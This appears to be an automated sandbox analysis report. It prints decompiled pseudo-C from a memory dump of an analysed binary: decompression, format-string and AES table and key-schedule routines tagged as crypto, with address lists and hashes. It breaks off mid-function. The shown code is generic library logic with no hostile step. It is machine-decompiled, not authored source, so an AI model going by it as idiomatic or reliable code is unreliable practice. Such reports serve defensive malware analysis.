													_t111 =  *((intOrPtr*)(_t171 + 0x14));
													goto L45;
												}
												break;
											}
											__eflags = _t78 - 0x10;
											if(_t78 != 0x10) {
												_t121 = (E0083A58C(_t139) >> 9) + 0xb;
												__eflags = _t121;
												_push(7);
											} else {
												_t121 = (E0083A58C(_t139) >> 0xd) + 3;
												_push(3);
											}
											E0083A575(_t168);
											__eflags = _t165;
											if(_t165 == 0) {
												L48:
												_t90 = 0;
												L50:
												L51:
												return _t90;
											} else {
												while(1) {
													_t121 = _t121 - 1;
													__eflags = _t165 - 0x1ae;
													if(_t165 >= 0x1ae) {
														goto L46;
													}
													 *(_t171 + _t165 + 0x2c) =  *((intOrPtr*)(_t171 + _t165 + 0x2b));
													_t165 = _t165 + 1;
													__eflags = _t121;
													if(_t121 != 0) {
														continue;
													}
													goto L44;
												}
												break;
											}
										}
										 *(_t171 + _t165 + 0x2c) = _t78;
										_t165 = _t165 + 1;
										goto L45;
									}
									_t150 = _t111 + (_t73 + 1) * 4;
									while(1) {
										__eflags = _t159 -  *_t150;
										if(_t159 <  *_t150) {
											break;
										}
										_t73 = _t73 + 1;
										_t150 = _t150 + 4;
										__eflags = _t73 - 0xf;
										if(_t73 < 0xf) {
											continue;
										}
										goto L27;
									}
									 *(_t171 + 0x10) = _t73;
									goto L27;
								}
								_t151 = 0x10;
								_t162 = _t159 >> _t151 - _t72;
								_t154 = ( *(_t162 + _t111 + 0x88) & 0x000000ff) +  *(_t168 + 4);
								 *_t168 =  *_t168 + (_t154 >> 3);
								 *(_t168 + 4) = _t154 & 0x00000007;
								_t78 =  *(_t111 + 0x488 + _t162 * 2) & 0x0000ffff;
								goto L28;
							}
							__eflags =  *_t168 -  *((intOrPtr*)(_t170 + 0x84)) - 5;
							if( *_t168 <=  *((intOrPtr*)(_t170 + 0x84)) - 5) {
								goto L19;
							}
							_t94 = E00844495(_t170);
							__eflags = _t94;
							if(_t94 == 0) {
								goto L48;
							}
							goto L19;
							L45:
							__eflags = _t165 - 0x1ae;
						} while (_t165 < 0x1ae);
						L46:
						 *((char*)(_t170 + 0xe662)) = 1;
						__eflags =  *((char*)(_t168 + 8));
						if( *((char*)(_t168 + 8)) != 0) {
							L49:
							_t115 =  *((intOrPtr*)(_t171 + 0x1e8));
							_push(0x132);
							_push(_t115);
							_push(_t171 + 0x2c);
							E00842CFB();
							_push(0x40);
							_push(_t115 + 0xeec);
							_push(_t171 + 0x166);
							E00842CFB();
							_push(0x10);
							_push(_t115 + 0x1dd8);
							_push(_t171 + 0x1a6);
							E00842CFB();
							_push(0x2c);
							_push(_t115 + 0x2cc4);
							_push(_t171 + 0x1b6);
							E00842CFB();
							_t90 = 1;
							goto L50;
						}
						__eflags =  *_t168 -  *((intOrPtr*)(_t170 + 0x84));
						if( *_t168 <=  *((intOrPtr*)(_t170 + 0x84))) {
							goto L49;
						}
						goto L48;
					}
					__eflags =  *_t168 -  *((intOrPtr*)(__ecx + 0x84)) - 0x19;
					if( *_t168 <=  *((intOrPtr*)(__ecx + 0x84)) - 0x19) {
						goto L5;
					}
					_t90 = E00844495(__ecx);
					__eflags = _t90;
					if(_t90 == 0) {
						goto L51;
					}
					goto L5;
				}
				return 1;
			}

0x00843a01
0x00843a03
0x00843a0d
0x00843a14
0x00843a18
0x00843a34
0x00843a35
0x00843a35
0x00843a38
0x00843a46
0x00843a49
0x00843a4e
0x00843a51
0x00843a8a
0x00000000
0x00843a8a
0x00843a61
0x00843a64
0x00843a69
0x00843a6b
0x00843a74
0x00843a74
0x00843a77
0x00843a77
0x00843a78
0x00843a7b
0x00000000
0x00000000
0x00843a7d
0x00843a82
0x00843a83
0x00843a85
0x00000000
0x00000000
0x00000000
0x00843a85
0x00843a87
0x00000000
0x00843a87
0x00843a6d
0x00843a8e
0x00843a8e
0x00843a8f
0x00843a8f
0x00843a9f
0x00843aa1
0x00843aa9
0x00843aaa
0x00843aab
0x00843aaf
0x00843ab4
0x00843ab4
0x00843ab6
0x00843ab6
0x00843aba
0x00843ad8
0x00843ada
0x00843ae1
0x00843ae7
0x00843aed
0x00843af1
0x00843b1e
0x00843b1f
0x00843b20
0x00843b24
0x00843b26
0x00843b41
0x00843b44
0x00843b50
0x00843b52
0x00843b56
0x00843b5b
0x00843b67
0x00843b69
0x00843b6b
0x00843b6d
0x00843b6d
0x00843b6f
0x00843b77
0x00843b77
0x00843b7a
0x00843b86
0x00843b88
0x00843b8b
0x00843bd5
0x00843bf2
0x00843bf2
0x00843bf5
0x00843bd7
0x00843be1
0x00843be4
0x00843be4
0x00843bf9
0x00843bfe
0x00843bfe
0x00843bff
0x00843c05
0x00000000
0x00000000
0x00843c07
0x00843c0c
0x00843c0d
0x00843c0f
0x00000000
0x00000000
0x00843c11
0x00843c11
0x00000000
0x00843c11
0x00000000
0x00843bfe
0x00843b8d
0x00843b90
0x00843bad
0x00843bad
0x00843bb0
0x00843b92
0x00843b9c
0x00843b9f
0x00843b9f
0x00843bb4
0x00843bb9
0x00843bbb
0x00843c38
0x00843c38
0x00843c9f
0x00843ca1
0x00000000
0x00843bbd
0x00843bbd
0x00843bbd
0x00843bbe
0x00843bc4
0x00000000
0x00000000
0x00843bca
0x00843bce
0x00843bcf
0x00843bd1
0x00000000
0x00000000
0x00000000
0x00843bd3
0x00000000
0x00843bbd
0x00843bbb
0x00843b7c
0x00843b80
0x00000000
0x00843b80
0x00843b2b
0x00843b2e
0x00843b2e
0x00843b30
0x00000000
0x00000000
0x00843b32
0x00843b33
0x00843b36
0x00843b39
0x00000000
0x00000000
0x00000000
0x00843b3b
0x00843b3d
0x00000000
0x00843b3d
0x00843af5
0x00843af8
0x00843b02
0x00843b0a
0x00843b0f
0x00843b12
0x00000000
0x00843b12
0x00843ac5
0x00843ac7
0x00000000
0x00000000
0x00843acb
0x00843ad0
0x00843ad2
0x00000000
0x00000000
0x00000000
0x00843c15
0x00843c15
0x00843c15
0x00843c21
0x00843c21
0x00843c28
0x00843c2c
0x00843c3c
0x00843c3c
0x00843c47
0x00843c4c
0x00843c4d
0x00843c50
0x00843c55
0x00843c5f
0x00843c67
0x00843c68
0x00843c6d
0x00843c77
0x00843c7f
0x00843c80
0x00843c85
0x00843c8d
0x00843c95
0x00843c98
0x00843c9d
0x00000000
0x00843c9d
0x00843c30
0x00843c36
0x00000000
0x00000000
0x00000000
0x00843c36
0x00843a23
0x00843a25
0x00000000
0x00000000
0x00843a27
0x00843a2c
0x00843a2e
0x00000000
0x00000000
0x00000000
0x00843a2e
0x00000000

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 209afea29aacf21f6988cc42c4347deef14359ebf5857457a8887e82daa47dd8
Instruction ID: eb2934222fbbfa4a251224204fc8d8875e405718b92aeeba7d46d770652b3be6
Opcode Fuzzy Hash: 209afea29aacf21f6988cc42c4347deef14359ebf5857457a8887e82daa47dd8
Instruction Fuzzy Hash: 8E71247170434D5BDB28DE6CC8C1BAD77D5FBA0308F00092DE9C6DB282DA34CA858796

Uniqueness

Uniqueness Score: -1.00%

Function 00853D1A, Relevance: .2, Instructions: 214
COMMONCrypto

Download Yara Rule

C-Code - Quality: 88%

			E00853D1A(void* __ecx) {
				char _v6;
				char _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				char _t49;
				signed int _t50;
				void* _t51;
				signed char _t54;
				signed char _t56;
				signed int _t57;
				signed int _t58;
				signed char _t67;
				signed char _t69;
				signed char _t71;
				signed char _t80;
				signed char _t82;
				signed int _t84;
				signed int _t86;
				signed int _t87;
				signed char _t92;
				void* _t95;
				intOrPtr _t100;
				unsigned int _t102;
				signed char _t104;
				void* _t112;
				unsigned int _t113;
				void* _t114;
				signed int _t115;
				signed int* _t116;
				void* _t119;
				void* _t121;
				void* _t122;
				void* _t124;
				void* _t125;

				_push(__ecx);
				_t119 = __ecx;
				_t92 = 1;
				_t49 =  *((char*)(__ecx + 0x31));
				_t124 = _t49 - 0x64;
				if(_t124 > 0) {
					__eflags = _t49 - 0x70;
					if(__eflags > 0) {
						_t50 = _t49 - 0x73;
						__eflags = _t50;
						if(_t50 == 0) {
							L9:
							_t51 = E00854908(_t119);
							L10:
							if(_t51 != 0) {
								__eflags =  *((char*)(_t119 + 0x30));
								if( *((char*)(_t119 + 0x30)) == 0) {
									_t113 =  *(_t119 + 0x20);
									_push(_t114);
									_v8 = 0;
									_t115 = 0;
									_v6 = 0;
									_t54 = _t113 >> 4;
									__eflags = _t92 & _t54;
									if((_t92 & _t54) == 0) {
										L46:
										_t100 =  *((intOrPtr*)(_t119 + 0x31));
										__eflags = _t100 - 0x78;
										if(_t100 == 0x78) {
											L48:
											_t56 = _t113 >> 5;
											__eflags = _t92 & _t56;
											if((_t92 & _t56) != 0) {
												L50:
												__eflags = _t100 - 0x61;
												if(_t100 == 0x61) {
													L53:
													_t57 = 1;
													L54:
													__eflags = _t92;
													if(_t92 != 0) {
														L56:
														 *((char*)(_t121 + _t115 - 4)) = 0x30;
														__eflags = _t100 - 0x58;
														if(_t100 == 0x58) {
															L59:
															_t58 = 1;
															L60:
															__eflags = _t58;
															 *((char*)(_t121 + _t115 - 3)) = ((_t58 & 0xffffff00 | _t58 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x78;
															_t115 = _t115 + 2;
															__eflags = _t115;
															L61:
															_t95 =  *((intOrPtr*)(_t119 + 0x24)) -  *((intOrPtr*)(_t119 + 0x38)) - _t115;
															__eflags = _t113 & 0x0000000c;
															if((_t113 & 0x0000000c) == 0) {
																E008531E4(_t119 + 0x448, 0x20, _t95, _t119 + 0x18);
																_t122 = _t122 + 0x10;
															}
															E00854BE8(_t119 + 0x448,  &_v8, _t115, _t119 + 0x18,  *((intOrPtr*)(_t119 + 0xc)));
															_t102 =  *(_t119 + 0x20);
															_t116 = _t119 + 0x18;
															_t67 = _t102 >> 3;
															__eflags = _t67 & 0x00000001;
															if((_t67 & 0x00000001) != 0) {
																_t104 = _t102 >> 2;
																__eflags = _t104 & 0x00000001;
																if((_t104 & 0x00000001) == 0) {
																	E008531E4(_t119 + 0x448, 0x30, _t95, _t116);
																	_t122 = _t122 + 0x10;
																}
															}
															E00854AB6(_t95, _t119, _t116, _t119, 0);
															__eflags =  *_t116;
															if( *_t116 >= 0) {
																_t71 =  *(_t119 + 0x20) >> 2;
																__eflags = _t71 & 0x00000001;
																if((_t71 & 0x00000001) != 0) {
																	E008531E4(_t119 + 0x448, 0x20, _t95, _t116);
																}
															}
															_t69 = 1;
															L70:
															return _t69;
														}
														__eflags = _t100 - 0x41;
														if(_t100 == 0x41) {
															goto L59;
														}
														_t58 = 0;
														goto L60;
													}
													__eflags = _t57;
													if(_t57 == 0) {
														goto L61;
													}
													goto L56;
												}
												__eflags = _t100 - 0x41;
												if(_t100 == 0x41) {
													goto L53;
												}
												_t57 = 0;
												goto L54;
											}
											L49:
											_t92 = 0;
											__eflags = 0;
											goto L50;
										}
										__eflags = _t100 - 0x58;
										if(_t100 != 0x58) {
											goto L49;
										}
										goto L48;
									}
									_t80 = _t113 >> 6;
									__eflags = _t92 & _t80;
									if((_t92 & _t80) == 0) {
										__eflags = _t92 & _t113;
										if((_t92 & _t113) == 0) {
											_t82 = _t113 >> 1;
											__eflags = _t92 & _t82;
											if((_t92 & _t82) == 0) {
												goto L46;
											}
											_v8 = 0x20;
											L45:
											_t115 = _t92;
											goto L46;
										}
										_v8 = 0x2b;
										goto L45;
									}
									_v8 = 0x2d;
									goto L45;
								}
								_t69 = _t92;
								goto L70;
							}
							L11:
							_t69 = 0;
							goto L70;
						}
						_t84 = _t50;
						__eflags = _t84;
						if(__eflags == 0) {
							L28:
							_push(0);
							_push(0xa);
							L29:
							_t51 = E00854713(_t119, _t114, __eflags);
							goto L10;
						}
						__eflags = _t84 - 3;
						if(__eflags != 0) {
							goto L11;
						}
						_push(0);
						L13:
						_push(0x10);
						goto L29;
					}
					if(__eflags == 0) {
						_t51 = E008548F0(__ecx);
						goto L10;
					}
					__eflags = _t49 - 0x67;
					if(_t49 <= 0x67) {
						L30:
						_t51 = E0085431F(_t92, _t119);
						goto L10;
					}
					__eflags = _t49 - 0x69;
					if(_t49 == 0x69) {
						L27:
						_t2 = _t119 + 0x20;
						 *_t2 =  *(_t119 + 0x20) | 0x00000010;
						__eflags =  *_t2;
						goto L28;
					}
					__eflags = _t49 - 0x6e;
					if(_t49 == 0x6e) {
						_t51 = E0085485D(__ecx, _t112);
						goto L10;
					}
					__eflags = _t49 - 0x6f;
					if(_t49 != 0x6f) {
						goto L11;
					}
					_t51 = E008548D1(__ecx);
					goto L10;
				}
				if(_t124 == 0) {
					goto L27;
				}
				_t125 = _t49 - 0x58;
				if(_t125 > 0) {
					_t86 = _t49 - 0x5a;
					__eflags = _t86;
					if(_t86 == 0) {
						_t51 = E00854259(__ecx);
						goto L10;
					}
					_t87 = _t86 - 7;
					__eflags = _t87;
					if(_t87 == 0) {
						goto L30;
					}
					__eflags = _t87;
					if(__eflags != 0) {
						goto L11;
					}
					L17:
					_t51 = E008545EB(_t92, _t119, __eflags, 0);
					goto L10;
				}
				if(_t125 == 0) {
					_push(1);
					goto L13;
				}
				if(_t49 == 0x41) {
					goto L30;
				}
				if(_t49 == 0x43) {
					goto L17;
				}
				if(_t49 <= 0x44) {
					goto L11;
				}
				if(_t49 <= 0x47) {
					goto L30;
				}
				if(_t49 != 0x53) {
					goto L11;
				}
				goto L9;
			}

0x00853d1f
0x00853d22
0x00853d26
0x00853d29
0x00853d2d
0x00853d30
0x00853d9e
0x00853da1
0x00853df0
0x00853df0
0x00853df3
0x00853d60
0x00853d62
0x00853d67
0x00853d69
0x00853e0e
0x00853e12
0x00853e1b
0x00853e20
0x00853e21
0x00853e25
0x00853e27
0x00853e2c
0x00853e2f
0x00853e31
0x00853e5a
0x00853e5a
0x00853e5d
0x00853e60
0x00853e67
0x00853e69
0x00853e6c
0x00853e6e
0x00853e72
0x00853e72
0x00853e75
0x00853e80
0x00853e80
0x00853e82
0x00853e82
0x00853e84
0x00853e8a
0x00853e8a
0x00853e8f
0x00853e92
0x00853e9d
0x00853e9d
0x00853e9f
0x00853e9f
0x00853eaa
0x00853eae
0x00853eae
0x00853eb1
0x00853eb7
0x00853eb9
0x00853ebc
0x00853ecc
0x00853ed1
0x00853ed1
0x00853ee6
0x00853eeb
0x00853eee
0x00853ef3
0x00853ef6
0x00853ef8
0x00853efa
0x00853efd
0x00853f00
0x00853f0d
0x00853f12
0x00853f12
0x00853f00
0x00853f19
0x00853f1e
0x00853f21
0x00853f26
0x00853f29
0x00853f2b
0x00853f38
0x00853f3d
0x00853f2b
0x00853f40
0x00853f43
0x00853f48
0x00853f48
0x00853e94
0x00853e97
0x00000000
0x00000000
0x00853e99
0x00000000
0x00853e99
0x00853e86
0x00853e88
0x00000000
0x00000000
0x00000000
0x00853e88
0x00853e77
0x00853e7a
0x00000000
0x00000000
0x00853e7c
0x00000000
0x00853e7c
0x00853e70
0x00853e70
0x00853e70
0x00000000
0x00853e70
0x00853e62
0x00853e65
0x00000000
0x00000000
0x00000000
0x00853e65
0x00853e35
0x00853e38
0x00853e3a
0x00853e42
0x00853e44
0x00853e4e
0x00853e50
0x00853e52
0x00000000
0x00000000
0x00853e54
0x00853e58
0x00853e58
0x00000000
0x00853e58
0x00853e46
0x00000000
0x00853e46
0x00853e3c
0x00000000
0x00853e3c
0x00853e14
0x00000000
0x00853e14
0x00853d6f
0x00853d6f
0x00000000
0x00853d6f
0x00853dfa
0x00853dfa
0x00853dfd
0x00853dcf
0x00853dcf
0x00853dd0
0x00853dd2
0x00853dd4
0x00000000
0x00853dd4
0x00853dff
0x00853e02
0x00000000
0x00000000
0x00853e08
0x00853d77
0x00853d77
0x00000000
0x00853d77
0x00853da3
0x00853de6
0x00000000
0x00853de6
0x00853da5
0x00853da8
0x00853ddb
0x00853ddd
0x00000000
0x00853ddd
0x00853daa
0x00853dad
0x00853dcb
0x00853dcb
0x00853dcb
0x00853dcb
0x00000000
0x00853dcb
0x00853daf
0x00853db2
0x00853dc4
0x00000000
0x00853dc4
0x00853db4
0x00853db7
0x00000000
0x00000000
0x00853dbb
0x00000000
0x00853dbb
0x00853d32
0x00000000
0x00000000
0x00853d38
0x00853d3b
0x00853d7b
0x00853d7b
0x00853d7e
0x00853d97
0x00000000
0x00853d97
0x00853d80
0x00853d80
0x00853d83
0x00000000
0x00000000
0x00853d86
0x00853d89
0x00000000
0x00000000
0x00853d8b
0x00853d8e
0x00000000
0x00853d8e
0x00853d3d
0x00853d76
0x00000000
0x00853d76
0x00853d42
0x00000000
0x00000000
0x00853d4b
0x00000000
0x00000000
0x00853d50
0x00000000
0x00000000
0x00853d55
0x00000000
0x00000000
0x00853d5e
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 60b7de3cb2a39437cdc6fe6ef6c29ff78e73ae8b7f18a3af6c87a7ac86428b6e
Instruction ID: 133587360c2cdb17f7179c3bfb9cab04d931e257d411d3b98343f187ef853c4f
Opcode Fuzzy Hash: 60b7de3cb2a39437cdc6fe6ef6c29ff78e73ae8b7f18a3af6c87a7ac86428b6e
Instruction Fuzzy Hash: B7515861600B4857DB35856C84577BEB7F9FB027CBF58081AEC42DB682C615DF4D8362

Uniqueness

Uniqueness Score: -1.00%

Function 0083DB11, Relevance: .2, Instructions: 190
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E0083DB11() {
				intOrPtr _v8;
				char _v521;
				char _t140;
				signed int _t154;
				signed int _t155;
				signed int _t159;
				signed int _t160;
				signed int _t161;
				signed int _t162;
				signed int _t179;
				signed int _t181;
				signed char _t192;
				signed int _t199;
				signed int _t207;
				void* _t208;
				signed int _t209;
				signed char _t211;
				signed int _t219;
				void* _t220;

				_t140 = 0;
				_t179 = 1;
				_t207 = 1;
				do {
					 *(_t220 + _t140 - 0x304) = _t207;
					 *(_t220 + _t140 - 0x205) = _t207;
					 *((char*)(_t220 + _t207 - 0x104)) = _t140;
					_v8 = _t140 + 1;
					asm("sbb ecx, ecx");
					_t140 = _v8;
					_t207 = _t207 ^  ~(_t207 & 0x80) & 0x0000011b ^ _t207 + _t207;
				} while (_t207 != 1);
				_t208 = 0;
				do {
					 *(_t208 + 0x874330) = _t179;
					asm("sbb ecx, ecx");
					_t179 = _t179 + _t179 ^  ~(_t179 & 0x80) & 0x0000011b;
					_t208 = _t208 + 1;
				} while (_t208 < 0x1e);
				_t181 = 0;
				do {
					if(_t181 == 0) {
						_t209 = 0;
					} else {
						_t209 =  *( &_v521 - ( *(_t220 + (_t181 & 0x000000ff) - 0x104) & 0x000000ff)) & 0x000000ff;
					}
					_t192 = (_t209 ^ (((_t209 + _t209 ^ _t209) + (_t209 + _t209 ^ _t209) ^ _t209) + ((_t209 + _t209 ^ _t209) + (_t209 + _t209 ^ _t209) ^ _t209) ^ _t209) + (((_t209 + _t209 ^ _t209) + (_t209 + _t209 ^ _t209) ^ _t209) + ((_t209 + _t209 ^ _t209) + (_t209 + _t209 ^ _t209) ^ _t209) ^ _t209) ^ 0x00006300) >> 0x00000008 ^ _t209 ^ (((_t209 + _t209 ^ _t209) + (_t209 + _t209 ^ _t209) ^ _t209) + ((_t209 + _t209 ^ _t209) + (_t209 + _t209 ^ _t209) ^ _t209) ^ _t209) + (((_t209 + _t209 ^ _t209) + (_t209 + _t209 ^ _t209) ^ _t209) + ((_t209 + _t209 ^ _t209) + (_t209 + _t209 ^ _t209) ^ _t209) ^ _t209);
					 *(_t181 + 0x874130) = _t192;
					 *(0x874f51 + _t181 * 4) = _t192;
					 *(0x874f50 + _t181 * 4) = _t192;
					 *(0x874b53 + _t181 * 4) = _t192;
					 *(0x874b50 + _t181 * 4) = _t192;
					 *(0x874753 + _t181 * 4) = _t192;
					 *(0x874752 + _t181 * 4) = _t192;
					 *(0x874352 + _t181 * 4) = _t192;
					 *(0x874351 + _t181 * 4) = _t192;
					if(_t192 == 0) {
						_t154 = 0;
					} else {
						_t154 =  *(_t220 + ( *(_t220 + (_t192 & 0x000000ff) - 0x104) & 0x000000ff) - 0x2eb) & 0x000000ff;
					}
					 *(0x874f53 + _t181 * 4) = _t154;
					 *(0x874b52 + _t181 * 4) = _t154;
					 *(0x874751 + _t181 * 4) = _t154;
					 *(0x874350 + _t181 * 4) = _t154;
					if(_t192 == 0) {
						_t155 = 0;
					} else {
						_t155 =  *(_t220 + ( *(_t220 + (_t192 & 0x000000ff) - 0x104) & 0x000000ff) - 0x303) & 0x000000ff;
					}
					_t219 = _t181 & 0x000000ff;
					 *(0x874f52 + _t181 * 4) = _t155;
					 *(0x874b51 + _t181 * 4) = _t155;
					 *(0x874750 + _t181 * 4) = _t155;
					 *(0x874353 + _t181 * 4) = _t155;
					if((((_t219 << 0x00000003 ^ _t219) << 0x00000002 ^ _t219) + ((_t219 << 0x00000003 ^ _t219) << 0x00000002 ^ _t219) >> 0x00000008 ^ ((_t219 << 0x00000003 ^ _t219) << 0x00000002 ^ _t219) + ((_t219 << 0x00000003 ^ _t219) << 0x00000002 ^ _t219)) == 5) {
						_t211 = 0;
					} else {
						_t211 =  *((intOrPtr*)( &_v521 - ( *(_t220 + (((_t219 << 0x00000003 ^ _t219) << 0x00000002 ^ _t219) + ((_t219 << 0x00000003 ^ _t219) << 0x00000002 ^ _t219) >> 0x00000008 & 0x000000ff ^ ((_t219 << 0x00000003 ^ _t219) << 0x00000002 ^ _t219) + ((_t219 << 0x00000003 ^ _t219) << 0x00000002 ^ _t219) & 0x000000ff ^ 0x00000005) - 0x104) & 0x000000ff)));
					}
					 *(_t181 + 0x874230) = _t211;
					if(_t211 == 0) {
						_t159 = 0;
					} else {
						_t159 =  *(_t220 + ( *(_t220 + (_t211 & 0x000000ff) - 0x104) & 0x000000ff) - 0x29c) & 0x000000ff;
					}
					_t199 = _t211 & 0x000000ff;
					 *(0x875f52 + _t181 * 4) = _t159;
					 *(0x875b51 + _t181 * 4) = _t159;
					 *(0x875750 + _t181 * 4) = _t159;
					 *(0x875353 + _t181 * 4) = _t159;
					 *(0x876f52 + _t199 * 4) = _t159;
					 *(0x876b51 + _t199 * 4) = _t159;
					 *(0x876750 + _t199 * 4) = _t159;
					 *(0x876353 + _t199 * 4) = _t159;
					if(_t211 == 0) {
						_t160 = 0;
					} else {
						_t160 =  *(_t220 + ( *(_t220 + _t199 - 0x104) & 0x000000ff) - 0x23d) & 0x000000ff;
					}
					 *(0x875f50 + _t181 * 4) = _t160;
					 *(0x875b53 + _t181 * 4) = _t160;
					 *(0x875752 + _t181 * 4) = _t160;
					 *(0x875351 + _t181 * 4) = _t160;
					 *(0x876f50 + _t199 * 4) = _t160;
					 *(0x876b53 + _t199 * 4) = _t160;
					 *(0x876752 + _t199 * 4) = _t160;
					 *(0x876351 + _t199 * 4) = _t160;
					if(_t211 == 0) {
						_t161 = 0;
					} else {
						_t161 =  *(_t220 + ( *(_t220 + _t199 - 0x104) & 0x000000ff) - 0x216) & 0x000000ff;
					}
					 *(0x875f51 + _t181 * 4) = _t161;
					 *(0x875b50 + _t181 * 4) = _t161;
					 *(0x875753 + _t181 * 4) = _t161;
					 *(0x875352 + _t181 * 4) = _t161;
					 *(0x876f51 + _t199 * 4) = _t161;
					 *(0x876b50 + _t199 * 4) = _t161;
					 *(0x876753 + _t199 * 4) = _t161;
					 *(0x876352 + _t199 * 4) = _t161;
					if(_t211 == 0) {
						_t162 = 0;
					} else {
						_t162 =  *(_t220 + ( *(_t220 + _t199 - 0x104) & 0x000000ff) - 0x225) & 0x000000ff;
					}
					 *(0x875f53 + _t181 * 4) = _t162;
					 *(0x875b52 + _t181 * 4) = _t162;
					 *(0x875751 + _t181 * 4) = _t162;
					 *(0x875350 + _t181 * 4) = _t162;
					_t181 = _t181 + 1;
					 *(0x876f53 + _t199 * 4) = _t162;
					 *(0x876b52 + _t199 * 4) = _t162;
					 *(0x876751 + _t199 * 4) = _t162;
					 *(0x876350 + _t199 * 4) = _t162;
				} while (_t181 < 0x100);
				return _t162;
			}

0x0083db1a
0x0083db1f
0x0083db21
0x0083db28
0x0083db28
0x0083db2f
0x0083db36
0x0083db3e
0x0083db4d
0x0083db53
0x0083db56
0x0083db58
0x0083db5c
0x0083db5e
0x0083db60
0x0083db6d
0x0083db73
0x0083db75
0x0083db76
0x0083db7b
0x0083db7d
0x0083db7f
0x0083db99
0x0083db81
0x0083db94
0x0083db94
0x0083dbb7
0x0083dbb9
0x0083dbbf
0x0083dbc6
0x0083dbcd
0x0083dbd4
0x0083dbdb
0x0083dbe2
0x0083dbe9
0x0083dbf0
0x0083dbf9
0x0083dc10
0x0083dbfb
0x0083dc06
0x0083dc06
0x0083dc12
0x0083dc19
0x0083dc20
0x0083dc27
0x0083dc30
0x0083dc47
0x0083dc32
0x0083dc3d
0x0083dc3d
0x0083dc49
0x0083dc4e
0x0083dc5a
0x0083dc66
0x0083dc6f
0x0083dc7f
0x0083dcb3
0x0083dc81
0x0083dcaf
0x0083dcaf
0x0083dcb5
0x0083dcbd
0x0083dcd4
0x0083dcbf
0x0083dcca
0x0083dcca
0x0083dcd6
0x0083dcd9
0x0083dce0
0x0083dce7
0x0083dcee
0x0083dcf5
0x0083dcfc
0x0083dd03
0x0083dd0a
0x0083dd13
0x0083dd27
0x0083dd15
0x0083dd1d
0x0083dd1d
0x0083dd29
0x0083dd30
0x0083dd37
0x0083dd3e
0x0083dd45
0x0083dd4c
0x0083dd53
0x0083dd5a
0x0083dd63
0x0083dd77
0x0083dd65
0x0083dd6d
0x0083dd6d
0x0083dd79
0x0083dd80
0x0083dd87
0x0083dd8e
0x0083dd95
0x0083dd9c
0x0083dda3
0x0083ddaa
0x0083ddb3
0x0083ddc7
0x0083ddb5
0x0083ddbd
0x0083ddbd
0x0083ddc9
0x0083ddd0
0x0083ddd7
0x0083ddde
0x0083dde5
0x0083dde6
0x0083dded
0x0083ddf4
0x0083ddfb
0x0083de02
0x0083de13

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b10c9f79543deebd0fda49a52cdc94de1e6c6e8746461cc3ea48a9b946933be
Instruction ID: 1a15e157cae474c02870326fe26c479ae21565e57c255c55ea7fab80a4f95f5d
Opcode Fuzzy Hash: 2b10c9f79543deebd0fda49a52cdc94de1e6c6e8746461cc3ea48a9b946933be
Instruction Fuzzy Hash: 3181AD811196D49EC70ACF3C38A82A57FA1B773341F1840AAC4CDC726BD576CAA8C761

Uniqueness

Uniqueness Score: -1.00%

Function 0083E546, Relevance: .2, Instructions: 154
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E0083E546(intOrPtr __ecx, signed char _a4) {
				char _v12;
				signed int _v13;
				signed int _v14;
				signed int _v15;
				signed int _v16;
				signed char _v17;
				signed char _v18;
				signed char _v19;
				signed char _v20;
				char _v28;
				signed int _v29;
				signed int _v30;
				signed int _v31;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				signed char _t96;
				signed int _t117;
				signed int* _t121;
				signed int* _t122;
				void* _t124;
				signed int _t125;
				signed int _t126;
				signed int _t127;
				void* _t129;
				void* _t130;
				signed int _t131;
				char* _t132;
				void* _t133;
				signed int _t135;
				intOrPtr _t137;
				signed char* _t139;
				void* _t141;
				void* _t161;
				void* _t164;

				_t137 = __ecx;
				_t135 = _a4 - 6;
				_v40 = __ecx;
				_v36 = _t135;
				_t96 = E0084EA80( &_v32, _a4, 0x20);
				_t141 =  &_v40 + 0xc;
				_t117 = 0;
				_t133 = 0;
				_t126 = 0;
				if(_t135 <= 0) {
					L10:
					if(_t117 <= _a4) {
						_t127 = 0x874330;
						do {
							_v32 = _v32 ^  *(( *(_t141 + 0x15 + _t135 * 4) & 0x000000ff) + 0x874130);
							_v31 = _v31 ^  *(( *(_t141 + 0x16 + _t135 * 4) & 0x000000ff) + 0x874130);
							_v30 = _v30 ^  *(( *(_t141 + 0x17 + _t135 * 4) & 0x000000ff) + 0x874130);
